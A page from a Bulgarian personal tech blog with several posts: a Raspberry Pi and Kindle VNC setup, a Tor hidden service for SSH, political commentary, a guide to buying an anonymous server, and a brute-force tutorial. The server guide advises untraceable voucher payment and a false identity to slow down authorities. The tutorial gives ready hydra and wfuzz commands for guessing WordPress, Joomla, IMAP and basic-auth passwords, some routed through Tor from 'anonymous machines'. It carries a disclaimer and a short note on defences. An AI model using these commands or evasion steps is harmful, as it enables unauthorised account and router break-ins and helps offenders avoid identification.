My new laptop = RaspberryPi + Kindle 4 NT instead of hdmi monitor

Kindle is awesome. This is the second device I use the most. There are days that my eyes bleed from 12 hours front of the computer. But my curiosity is bigger than the pain. Here comes the Kindle with its soft for the eyes e-ink. In fact, the Kindle is the only device I can use outside. I'm planning a sunny summer, but I have lots of projects, so the way to combine work with pleasure is to create myself a gadget that works good outdoors. After numerous tests I finally came with this device:

 

Raspberry + Kindle as Monitor

 

My initial plan was to use the Kindle as VNC client, and the Raspberry for VNC server. I have to create a script that starts the VNC client and server on both devices. I've choose to use /etc/network/interfaces as event trigger - the Kindle is connected to the Rspberry with usb network (keep reading). Now when I connect the Kindle via USB cable to the Raspberry a script starts VNC server and VNC client.

I want to share you my steps.

 

KINDLE

RASPBERRY PI

We are going to use x11vnc server, because I wanted to use keyboard and mouse. I will attach them to the Pi,  but I want to "see" them on the Kindle's screen. My research introduced me to x11vnc.

 

Turn on VNC Client on Kindle, Turn on VNC server on Pi

/etc/network/interfaces/

iface usb0 inet static
        address 192.168.10.1
        netmask 255.255.255.0
        broadcast 192.168.10.255
        up iptables -I INPUT -s 192.168.10.2 -j ACCEPT
        up /home/pi/is_online

pi@raspberrypi ~ $ cat /home/pi/is_online 

ping -c 1 -t 1 192.168.10.2 > /dev/null;
if [ $? -eq 0 ]; then
    echo "${kindle_ip} is up";
        su pi -c 'x11vnc -scale 800x600 -display :0 &'
        sleep 2
        su - pi -c "ssh -n -f root@192.168.10.2 \"sh -c '/mnt/us/kindlevncviewer/kvncviewer.sh 192.168.10.1:0'\" &"
else 
    echo "kindle is down";
fi

Conclusion

Its an awesome device for coding python on a sunny summer day. I'm also using 7'' android tablet as screen, again as a VNC client, when I need colors :--) I'm planning to share the wifi connection from the Kindle to the PI. That way I won't need external USB wifi. I need to work on the design too :--) But its possible to code in a sunny day :)


Чашата ще прелее

Една революция не е достатъчна.

 


rip, Aaron

"access to knowledge and access to justice have become all about access to money, and Aaron tried to change that..." rip


проблеми със звука при debian amd64

Sound Problem

If you have sound problems you may be missing libpulse.You can install it with:

# apt-get install libpulse0:i386

източник debian wiki


SSH през Tor

Поствам това тук, защото някой пък ще ми потребява и няма да мога да се прибера у дома :) Живеем в NAT-ed свят.

Пуснал съм си SSH през TOR

HiddenServiceDir /var/lib/tor/ssh/
HiddenServicePort 22 127.0.0.1:22


И ако ми потребва да се "прибирам у дома" от някоя машина:
 

~/.ssh/config

Host *.onion
ProxyCommand connect -R remote -5 -S 127.0.0.1:9050 %h %p


HideMyAss

HideMyAss е готина VPN услуга, с над 14к IPта. Сигурен съм, че освен за скриване на самоличността може да се ползва и за нещо друго. Идеи?

 

HideMyAss.com


w000t w0000t

Hellou, Inernet Citizens,

Не съм умрял, не съм и офлайн :)  С този фейсбук и другите тъпи социалки, мижавите блогове като моя, си изгубиха смисъла. Ще драсна някое-друго туториалче, само да се застуди..

Поздрави


Ново: търсене в архив от новини в gramophon.com

Най-накрая се наканих и направих нещо ново за сайтчето, което отварям всеки ден по няколко пъти. Въпреки навлизането на социалните мрежи, Грамофон си остана моят портал в интернет. Отварям го още от сутринта, с кафето, и не спирам да го проверявам цял ден. От там научавам новинките, от там следя постовете на българските блогъри, от там се ориентирам с какво да се облека, а напоследък от там правя и изследвания на архив новини. Последното стана възможно след като инсталирах и конфигурирах Сфинкс сърч. Така успях да направя доста бързо търсене в до сега агрегираните новини и статии - около 1,300,000 (и растат всеки ден..). Чрез търсенето попадам на много интересни статии, които по някаква причина съм пропуснал.

ГЕРБ, БСП, НДСВ, СДС, ДСБ, Бойко Борисов, Сергей Станишев, Уорлик, Русия, Америка, Иран

 


#ACTA

Споразумението #ACTA, което Америка иска да прокара в Европа е прясно доказателство, че не трябва да се вярва и партнира сляпо на нито една "Велика" сила. Дори тя да е заела позиция на Световна полиция. Преди поемахме от изток, сега поемаме от запад. Чак сега разбирам какво са имали предвид анонимните творци, когато нарисуваха паметника в София и написаха "В крак с времето". Преди сме строели малумни паметници сляпо вярващи на "братят-освободитлели". Днес, в крак с времето, пак се заробваме - този път чрез "търговски споразумения" от Запад. Дано не се окаже, че Западът обича цензурата, досиетата и донасянето повече от Изтока.

Защо си мисля, че американците нарочно ни показаха интернет, накараха ни да станем зависими от него, а сега искат да ни го дръпнат...? Зависимости! И преди са действали, като гледам действат и сега. И въпреки че Бого е започнал борбата преди 2-3 години, аз и доста мои познати чак сега разбират какъв автогол си вкарваме, ако оставим да мине споразумението #ACTA. Защо хората не се интересуват навременно от правата си, а се бунтуват чак като им ги вземат. Не е никак футуристично, ако кажем че скоро може да живеем като герои от роман на Оруел...

Оптимистичното е че, ако до преди 3 дена нямаше нито една медия, която да е писала по темата, от три дена насам все пак започна да се пише за това. Е, някои политици се метнаха на вълната на недоволството, но да се надяваме, че ще ги запомним до другите избори. А там ще ги накажем поименно.


Tова е България

Препоръчвам това видео на всеки, който има проблеми с самочувствието си на българин.


Как да си купим анонимен сървър?

Ако властите или конкуренцията Ви дишат във врата, или поне си мислите че го правят, можете да прибегнете до закупуването на анонимен сървър, някъде из интернет, през който да прекарате трафика си (VPN). Така ще ги забавите малко, докато разберат какво се случва. Практически VPN се явява една дълбоко заустена тръба в интернет, от която излиза Вашия трафик. Нещо като тази. Шегата на страна! Ако публикувате в интернет през истинското си IP чувствителна информация е въпрос на време да се разбере истинската Ви самоличност. Ако имате така нареченото статично IP, което си е само за Вас - това е елементарна задача. За да скриете самоличността можете да си сетъпнете VPN сървър някъде из света, който да се явява Вашата трибуна към интернет. Трафикът между него и Вас е криптиран, т.е. нещо като метална тръба до него. Ако в момента трафикът Ви е излизал от Варна, България, а след това трафика Ви ще излиза от Франция, за пример. Също като тръбата на Златни пясъци :)

Но ако платите за сървъра си с кредитната карта, дали въобще има смисъл да го сетъпвате? Вие вече сте осведомили, който трябва, че вирутално се премествате във Франция. И пак могат да Ви идентифицират.

altЗатова Ви препоръчвам да си купите анонимно сървър от Mr. Zhang,  но в никакъв случай да не плащате чрез кредитна карта. Най-добрият начин е плащане в кеш, но трудно ще стигнете до Китай, за да му платите на този човек. Затова в белите страни са измислени така наречените предплатени кредитни карти. В България няма да намерите такива. Но във Франция, Испания, Португалия има. Сигурен съм че имате приятел там. Изпратете му пари и му заръчайте да ви купи ваучър Ukash. Инструктирайте го да плати в КЕШ, а след това да Ви изпрати номерата на ваучъра. С него отивате при Mr. Zhang и си избирате машина. Може би не е нужно да Ви напомням, че е хубаво да се представите на Mr. Zhang като измислено лице, макар трудно да стигне Интерпол до него в Китай. Но Вие се подсигурете.

Същото важи и за покупка на анонимен домейн. До сега обаче нямам практика да съм купувал и бих приел Вашите съвети от къде е най-сигурно да се пазарува!


Как да влезем взлом (bruteforce) Wordpress/Joomla/Other web apps

Дори и най-перфектно и сигурно написаният сайт може да бъде компрометиран от глупостта на задклавиатурното устройство. Колкото и да сте си играли да осигурявате някой администраторски панел, в случай че сте дали парола на секретарката Незабравка, то Вие сте оставили дупка в сигурността на апликацията. Обикновено тези съсловия, но не само те, избират лесни и кратки паролки. Дали ще е рожденна дата, дали ще е кратко име с цифри 123 накрая, а може би елементарното 123456, то Вашият админ панел е отворен към света. Точно както няма ключалка направена от човек, която да не може да се разбие от човек, така е и с паролите. Но при разбиването на пароли по-големи от 10 символа вече си говорим за много ресурси и време. Парола от 6 цифри е елементарна за разбиване, а 6 до 8 букви и цифри - е реалистично. Затова избирайте сериозни и трудни пароли. И карайте потребителите си да го правят, иначе е било безсмислено да пишете качествен и сигурен код.

Една от стъпките при одит на сигурност на уеб сайт е проверката за слаби пароли. Много от уеб апликациите нямат защита срещу ботове (каптча или забрана след n на брой опити), което улеснява нашата задача при изпробване на речници с пароли. Всичко е автомагично, нали не мислите че ще го правим на ръка?

Инструментите, които Ви трябват, за разбиване на уеб апликации са crunch и wfuzz или hydra. Също така Ви трябва и анонимна машина (една или повече) от която да правите пробите. С crunch можете да генерирате речници с пароли. За него има страхотно ръководство тук. Wfuzz и Hydra имат интересни способности, документацията им е доста дискриптивна, но няма твърде много публикувани примери. Затова аз пускам моите записки тук, за да ги ползвате като начало на Вашето изследване. Не смятам да описвам документацията на тези програмки, а само да Ви дам примери за ползването им. Тези инструменти можете да ги намерите готови за използване в тази дистрибуция.

Как да влезем взлом (bruteforce) в Wordpress

hydra -l admin -P  /path/to/wordlist -s 80 wordpress_url_here http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=1:ERROR"

python wfuzz.py -t 1 -s 10 -c -z file -f  /path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&submit=1" http://wordpress_url_here/wp-login.php -V

Как да влезем взлом (bruteforce) в Joomla

python wfuzz.py -t 1 -s 10 -c -z file -f  /path/to/wordlist -d "usrname=admin&pass=FUZZ&submit=1" http://joomla_url_here/administrator/

Как да влзем взлом (bruteforce) в IMAP сървър

hydra -l user@emaila.com -P /path/to/wordlist server_host_here imap

Как да разбием basic auth (.htaccess & .htpasswd)

hydra -l admin -P wordlist/mywordlist/mixalpha-numeric-all-space_6 192.168.0.1 http-head /

(полезно при разбиване на модеми, рутери, аксес пойнтове)

В повечето случаи когато разбивате уеб апликация ще получавате код 200 при грешна парола, и 301 при успешна двойка. Така ще се ориентирате, коя парола е съвпаднала. Във всеки случай, трябва да знаете как работи системата за аутентикация преди да започнете да я разбивате.

Как да ползваме wfuzz през Tor

Изключително бавно е! Но все пак трябва да го отбележа като възможен сценарии.

python wfuzz.py -x SOCKS5 -p localhost:8118 -t 1 -s 10 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" http://host/wordpress/wp-login.php

python wfuzz.py -x SOCKS5 -p localhost:8118 -t 15 -s 3 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" -o html http://host/wp-login.php 2> file_to_print.html

!! АВТОРЪТ НЕ НОСИ НИКАКВА ОТГОВОРНОСТ ЗА ДЕЙСТВИЯТА НА ТРЕТИ ЛИЦА! Информацията тук е предоставена единствено за образователни и защитни цели! Хората трябва да знаят колко е лесно, за да се пазят по-добре! По-добре ще е да я ползвате за одит, а не за разбиване на паролата на рутера на съседа, нали? НЕ НОСЯ ОТГОВОРНОСТ!

Може би ще е добре да кажа и как се защитава Wordpress от взлом: С някой плугин от този тип. А imap, web, ssh и други демони могат да се защитят с Fail2Ban.


1 2 3 ... 57 58 59  Next»